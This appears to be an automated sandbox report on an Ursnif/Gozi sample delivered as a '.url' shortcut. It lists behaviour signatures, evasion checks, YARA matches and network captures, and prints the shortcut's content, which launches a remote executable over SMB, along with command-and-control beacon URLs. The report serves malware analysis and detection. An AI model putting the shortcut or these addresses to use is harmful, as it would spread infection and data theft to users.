      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Data Obfuscation

      barindex
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeUnpacked PE file: 3.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B87F30 push ecx; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B8831B push ecx; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02D54EDB push 8B8751D0h; retf
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02D5A167 push edi; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02D4FC2D pushad ; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE7F30 push ecx; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE831B push ecx; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02C59883 push 8B8751D0h; retf
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02C545D5 pushad ; ret
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02C5EB0F push edi; ret

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632Thread sleep count: 75 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632Thread sleep count: 313 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632Thread sleep count: 268 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632Thread sleep count: 36 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 40 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 472 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 47 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 97 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 39 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 40 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 601 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852Thread sleep count: 210 > 30
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWindow / User API: threadDelayed 472
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeWindow / User API: threadDelayed 601
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\System32 FullSizeInformation
      Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX7
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
      Source: server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: server.exe, 00000005.00000002.2850719337.0000000002C8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B60D90 mov eax, dword ptr fs:[00000030h]
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B6092B mov eax, dword ptr fs:[00000030h]
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02D523B0 push dword ptr fs:[00000030h]
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02C56D58 push dword ptr fs:[00000030h]
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B83BD3 cpuid
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B8213E SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B854D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B83BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\server.exe
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\server.exe
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\server.exe
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\SystemResources\server.exe.mun
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\SystemResources\server.exe.mun
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeFile opened: \\46.8.19.120\Agenzia\

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Network Share Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts2
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      System Time Discovery
      Remote Desktop Protocol1
      Clipboard Data
      Exfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
      Process Injection
      Security Account Manager1
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Obfuscated Files or Information
      NTDS1
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets1
      Process Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      DLL Side-Loading
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Account Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      System Owner/User Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
      Remote System Discovery
      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing15
      System Information Discovery
      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      marzo.txt.url8%ReversingLabsWin32.Trojan.Casdet
      marzo.txt.url7%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      3.2.server.exe.2b80000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK80%Avira URL Cloudsafe
      http://5.44.43.17/~0%Avira URL Cloudsafe
      http://5.44.43.17/0%Avira URL Cloudsafe
      http://5.44.43.17/b2c5-fe065076e0a10%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://5.44.43.17/server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://5.44.43.17/~server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://5.44.43.17/b2c5-fe065076e0a1server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vrserver.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            5.44.43.17
            unknownRussian Federation
            202423MGNHOST-ASRUtrue
            192.229.221.95
            unknownUnited States
            15133EDGECASTUSfalse
            Joe Sandbox Version:37.0.0 Beryl
            Analysis ID:826967
            Start date and time:2023-03-15 12:30:25 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 4m 50s
            Hypervisor based Inspection enabled:false
            Report type:light
            Cookbook file name:defaultwindowsinteractivecookbook.jbs
            Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:1
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:marzo.txt.url
            Detection:MAL
            Classification:mal88.troj.spyw.evad.winURL@2/3@2/2
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 51.1% (good quality ratio 48.5%)
            • Quality average: 79.8%
            • Quality standard deviation: 29.1%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .url
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
            File Type:data
            Category:dropped
            Size (bytes):8192
            Entropy (8bit):4.252651136206788
            Encrypted:false
            SSDEEP:48:Y4wW6WQUOiWwNHxaUJ3EdJ7mh9HP/XOky96BexvkafzwSGDMh1KTCB382ERQFNqs:Y4wiARUOAPg7K6erUPtnEiZwiFDv
            MD5:B8BA6B7187B954175903A42227D0D074
            SHA1:C8CCE7F52C0AE82D5491D8068898F84D61BE72CD
            SHA-256:3FC29469CA7B7E2D992FE4F773E31E961D7A0138034CD4B354A20F099C084015
            SHA-512:15908F1B0FDEF892B22AB80F598BBD1242B8CB9E0397715AD1BA47E493A56734D9EABDDDDF7431C08B730EA62A51E7CB4FBEE80E940D83CC34852109D2AF9632
            Malicious:false
            Reputation:low
            Preview:........@.........X.1W..(........................... ...8.(......+......X..................1W..#..*...C.L...0T.j................V.F.........................):X..................1W..#..*...C.L...0T.j...............]^.F.........................':X..................1W..#..*...C.L...0T.j................d.F.........................(:X..................1W..#..*...C.L...0T.j...............1i.F.........................&:X..................1W..#..*...C.L...0T.j................n.F.........................*:X..................1W..#..*...C.L...0T.j................r.F.........................c:X..................1W..#..*...C.L...0T.j................w.F........................._:X..................1W..#..*...C.L...0T.j...............E|.F.........................b:X..................1W..#..*...C.L...0T.j.................F.........................`:X..................1W..#..*...C.L...0T.j...............)..F.........................a:X..................1W..#..*...C.L...0T.j.......
            Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
            File Type:XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
            Category:modified
            Size (bytes):1596
            Entropy (8bit):4.637608585062843
            Encrypted:false
            SSDEEP:24:3zNOB9IGVPF9o/WgHOfH176h9Ga5UiGPF9o/WgHOfH1KdR4Mfa4:DNcCGF9o/ufV76jryF9o/ufVKT
            MD5:05C75784B643BF3D900ECA7142449F49
            SHA1:2763DC3D4C243EF1E7BDB54EBAEC3DF3DE9D5B5D
            SHA-256:7290D05C07B3DDF1189C8CF30E64122E03DF51C2A8332FAF1060100CF8932D70
            SHA-512:4EF65759299F291EA0AE6F808CAF002A8FF570075E5EF35FE5D6863AB3A52B7A056AFEFE8D12DE5A2433DDA8EC51E876767492E0526A205A62B04E78133A6D49
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0"?>..<wundbar>...<initMail>1</initMail>...<initShortcuts>1</initShortcuts>...<version>1613929</version>...<dataversion>1202</dataversion>...<stores>....<storeblock>.....<eidstore>0000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C00000000004E495441F9BFB80100AA0037D96E0000000043003A005C00550073006500720073005C0061006C0066007200650064006F005C0044006F00630075006D0065006E00740073005C004F00750074006C006F006F006B002000460069006C00650073005C004F00750074006C006F006F006B00200044006100740061002000460069006C00650020002D0020004E006F0045006D00610069006C002E007000730074000000</eidstore>.....<storeid>0</storeid>.....<crawledIn12>1</crawledIn12>....</storeblock>...</stores>...<userdefined>....<linkgroup name="Shortcuts" clsid="F01F40A0D5668A48AA01551BB46FA468">.....<wdLnk>......<ltype>shortcut</ltype>......<storeid>0</storeid>......<icondata/>......<reckey>DB534562B7845545954A1594721BD1D6</reckey>......<eid>0000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C0000
            Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
            File Type:data
            Category:dropped
            Size (bytes):6694
            Entropy (8bit):1.872940016765219
            Encrypted:false
            SSDEEP:24:KI+ZiNEXTwIrlcNJKgsFMhaUAbYh9EO9O48xP4TKn+ZhmKEpZFq+cnT3/k6vq+5z:K/MIWKfg2aVk1t4TKvjQ3Mg
            MD5:C9175FCB9AE1728759F63A4951D61701
            SHA1:37359EAF4FFA4370EC46323C90EF327ABB282F76
            SHA-256:CEBF4CEA7D9A7C055FB38C9EAE31A136A701CC5727D472D13C29F2C3BD0AF368
            SHA-512:2538518B90658CD9132569712C21ED7AD5B820647F70F0640533F79A21E5B5E9E14128FCBB52AD07B92A5CD3E17E80162D1740B080F037C8854E6C798402A286
            Malicious:false
            Reputation:low
            Preview:.................X..............................................................&...............D...................................................................................................................................................................................................................................................................................................................................................................................................................7.........D.......................`.......................d........(......b.......j........I...... ................y......r.......T.......@...............x........s......D.......|.......................@.......@.......n.......D........x..............................T...............@`......................................................................@u......V...............@.......................@.......................@........................=......n................K...... ...............
            File type:MS Windows 95 Internet shortcut text (URL=<file://46.8.19.120/Agenzia/server.exe>), ASCII text, with CRLF line terminators
            Entropy (8bit):5.238475343799848
            TrID:
            • Windows URL shortcut (11001/1) 91.66%
            • Generic INI configuration (1001/1) 8.34%
            File name:marzo.txt.url
            File size:192
            MD5:d8dc17b22192b297073d5749a7b49966
            SHA1:606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
            SHA256:f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
            SHA512:cce016c592afc7903143ec6891d364830ef869b13abb912d267a27270fa1701f2d1e1c86794c47f85095f9e7c14e250787cf1aa2b6c179aff8cc0bcda6918349
            SSDEEP:3:HRAbABGQEb/5sQaGSXZYj8XkAoIvycAI9RyJ25YdimVVG/VClAWHyn:HRYFJb/5sZGgYj8UNIvyc1yc54vVG/4c
            TLSH:32C022044A0E8077C142440A8058BC58A90EB0581CEFC83822C5D987BC804C1CD08ABA
            File Content Preview:[InternetShortcut]..IconIndex=70..HotKey=0..IDList=..URL=file://46.8.19.120/Agenzia/server.exe..IconFile=C:\Windows\system32\SHELL32.dll..[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,9..
            Icon Hash:64e0e4e4e4e9e1ed
            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            192.168.2.35.44.43.1749733802033203 03/15/23-12:33:08.360785TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973380192.168.2.35.44.43.17
            192.168.2.35.44.43.1749733802033204 03/15/23-12:33:08.360785TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973380192.168.2.35.44.43.17
            TimestampSource PortDest PortSource IPDest IP
            Mar 15, 2023 12:31:38.167218924 CET8049705192.229.221.95192.168.2.3
            Mar 15, 2023 12:31:38.169547081 CET4970580192.168.2.3192.229.221.95
            Mar 15, 2023 12:31:45.872168064 CET8049720192.229.221.95192.168.2.3
            Mar 15, 2023 12:31:45.872308969 CET4972080192.168.2.3192.229.221.95
            Mar 15, 2023 12:31:48.039853096 CET8049727192.229.221.95192.168.2.3
            Mar 15, 2023 12:31:48.040059090 CET4972780192.168.2.3192.229.221.95
            Mar 15, 2023 12:32:03.663597107 CET4972780192.168.2.3192.229.221.95
            Mar 15, 2023 12:32:39.607276917 CET8049705192.229.221.95192.168.2.3
            Mar 15, 2023 12:32:39.607542992 CET4970580192.168.2.3192.229.221.95
            Mar 15, 2023 12:32:41.122843027 CET4972080192.168.2.3192.229.221.95
            Mar 15, 2023 12:32:41.141417980 CET8049720192.229.221.95192.168.2.3
            Mar 15, 2023 12:32:41.142498970 CET4972080192.168.2.3192.229.221.95
            Mar 15, 2023 12:33:08.308319092 CET4973380192.168.2.35.44.43.17
            Mar 15, 2023 12:33:08.360223055 CET80497335.44.43.17192.168.2.3
            Mar 15, 2023 12:33:08.360382080 CET4973380192.168.2.35.44.43.17
            Mar 15, 2023 12:33:08.360785007 CET4973380192.168.2.35.44.43.17
            Mar 15, 2023 12:33:08.413362026 CET80497335.44.43.17192.168.2.3
            Mar 15, 2023 12:33:08.414658070 CET80497335.44.43.17192.168.2.3
            Mar 15, 2023 12:33:08.414844036 CET4973380192.168.2.35.44.43.17
            Mar 15, 2023 12:33:08.415833950 CET4973380192.168.2.35.44.43.17
            Mar 15, 2023 12:33:08.467634916 CET80497335.44.43.17192.168.2.3
            TimestampSource PortDest PortSource IPDest IP
            Mar 15, 2023 12:31:48.190037012 CET5234253192.168.2.31.1.1.1
            Mar 15, 2023 12:31:48.219518900 CET53523421.1.1.1192.168.2.3
            Mar 15, 2023 12:33:03.584960938 CET6058353192.168.2.31.1.1.1
            Mar 15, 2023 12:33:03.605824947 CET53605831.1.1.1192.168.2.3
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Mar 15, 2023 12:31:48.190037012 CET192.168.2.31.1.1.10xc3afStandard query (0)checklist.skype.comA (IP address)IN (0x0001)false
            Mar 15, 2023 12:33:03.584960938 CET192.168.2.31.1.1.10x6b45Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Mar 15, 2023 12:31:48.219518900 CET1.1.1.1192.168.2.30xc3afName error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
            Mar 15, 2023 12:33:03.605824947 CET1.1.1.1192.168.2.30x6b45Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
            • 5.44.43.17

            Click to jump to process

            Target ID:0
            Start time:12:30:59
            Start date:15/03/2023
            Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
            Imagebase:0x7ff686560000
            File size:41778000 bytes
            MD5 hash:CA3FDE8329DE07C95897DB0D828545CD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Target ID:3
            Start time:12:31:17
            Start date:15/03/2023
            Path:\Device\Mup\46.8.19.120\Agenzia\server.exe
            Wow64 process (32bit):true
            Commandline:"\\46.8.19.120\Agenzia\server.exe"
            Imagebase:0x400000
            File size:316928 bytes
            MD5 hash:C29870BA33B8691967B100BC30572BB7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
            Reputation:low

            Target ID:5
            Start time:12:32:13
            Start date:15/03/2023
            Path:\Device\Mup\46.8.19.120\Agenzia\server.exe
            Wow64 process (32bit):true
            Commandline:"\\46.8.19.120\Agenzia\server.exe"
            Imagebase:0x400000
            File size:316928 bytes
            MD5 hash:C29870BA33B8691967B100BC30572BB7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
